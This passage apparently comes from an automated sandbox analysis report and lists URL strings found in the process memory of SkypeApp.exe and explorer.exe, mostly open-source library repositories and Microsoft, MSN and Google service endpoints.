Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/bitstadium/HockeySDK-Android)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/blueimp/JavaScript-MD5)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/borisyankov/DefinitelyTyped
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/brentvatne/react-native-video)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/browserify/path-browserify)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chirag04/react-native-tooltip)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/defunctzombie/node-process)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/defunctzombie/node-util)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/devfd/react-native-geocoder)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dfcreative/color-name)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dmnd/dedent)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/reactive)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/eemeli/make-plural.js)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/eps1lon
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/errwischt/stacktrace-parser)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/SoLoader)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/conceal)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/draft-js)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/fbjs)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/folly)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/fresco)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/immutable-js)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/metro)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/prop-types)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/react)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/react-native)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/rebound-js)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/regenerator/tree/master/packages/regenerator-runtime)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/yoga)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebookarchive/react-native-custom-components)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebookincubator/TextLayoutBuilder/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/faisalman/ua-parser-js)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/feross/buffer)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/feross/ieee754)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fontello/svgpath)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fresc81/node-winreg)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/github/fetch)
Source: SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/googl/5
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/double-conversion/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/glog)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/grafika)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/gson)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/hnq90/react-native-filesystem-v1)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/hoo29
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ide/react-clone-referenced-element)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/inherits)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jinder/path)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jkomyno
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joeferraro/react-native-cookies)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jryans/timers-browserify)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/juliangruber/isarray)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/kjin
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/kjur/jsrsasign)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lelandrichardson/react-native-safe-module)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lodash/lodash
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lodash/lodash)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/madriska/react-native-quick-actions)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/magicismight/react-native-svg)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/magus/react-native-fxblurview)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/marcshilling/react-native-image-picker)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mathiasbynens/emoji-regex)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/testfx)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/vstest/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/moment/moment)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/muaz-khan/RecordRTC)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/muhammaddadu/ifvisible)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mwiktorczyk
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mysticatea/event-target-shim)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/n-e
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/necolas/normalize.css/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nihgwu/react-native-flanimatedimage/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodeca/pako)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/oblador/react-native-keychain)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/octo-sniffle
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/open-source-parsers/jsoncpp/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/opencover/opencover)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/oysteinkrog/SQLite.Net-PCL)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/parambirs
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/phongcao/image-pipeline-windows)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pusherman/react-native-network-info)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pvorb/node-clone)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/qix-/color-convert)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/qix-/color-string)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/react-native-community/react-native-linear-gradient)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/reactjs/react-timer-mixin)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rhaker/react-native-record-audio-ios#cbd294f5ca2ff6c21926326a8a110aa1136640e9)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rt2zz/react-native-contacts)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sebmarkbage/art)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/seegno/google-libphonenumber)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/serkanyersen/ifvisible.js/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/escape-string-regexp)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/object-assign)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/slowpath/react-native-hockeyapp)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/smac89
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sqlcipher/android-database-sqlcipher)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sqlcipher/sqlcipher.git)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/square/leakcanary)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/square/okhttp)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/square/okio)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tellnes
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/then/promise)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/vvakame
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/wasabeef/Blurry/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/webpack/node-libs-browser)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/wwwy3y3
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/xianyi/OpenBLAS)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/yqritc/Android-ScalableVideoView)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zbtang/React-Native-ViewPager)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/invariant)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zeux/pugixml)
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://js.foundation/
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://maps.google.com/maps/api/geocode/json
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3457252334.0000016D90CBC000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathiasbynens.be/
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com?gologin=1
Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skypeassets.azurewebsites.net/skype-assets/
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spoprod-a.akamaihd.net/files/fabric/assets/item-types/48_2x/
Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sprinklesapp.com/
Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://substrate.office.com/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webkit.org/licensing-webki)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://webkit.org/licensing-webkit/
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000005.00000000.1237220182.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3728348444.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074166064.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bingapis.com/api/v6/Places/AutoSuggest
Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
